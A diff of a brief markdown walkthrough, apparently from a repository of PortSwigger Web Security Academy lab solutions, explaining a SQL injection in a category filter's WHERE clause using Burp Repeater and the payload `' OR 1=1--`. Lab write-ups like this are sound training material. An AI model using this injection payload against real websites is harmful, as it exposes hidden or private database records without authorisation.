zackrage99/portswigger-web-security-solutions/SQL-Injection/SQLi-WHERE-clause-hidden-data.md

 1. Search for endpoints that uses sql query
 2. Found `category` parameter in `/filter?category=Corporate+gifts`
 3. Tested with `'` → 500 error (confirmed injectable)
+4. Open burpsuite send the request to repeater
-4. Added `' OR 1=1--` → All products revealed
+5. Added `' OR 1=1--`
+6. highlight the payload and `ctrl+r` to url encode it
+7. send the request
-5. Lab solved
+8. Lab solved

 ## Payload:
 /filter?category=Corporate+gifts'+OR+1=1--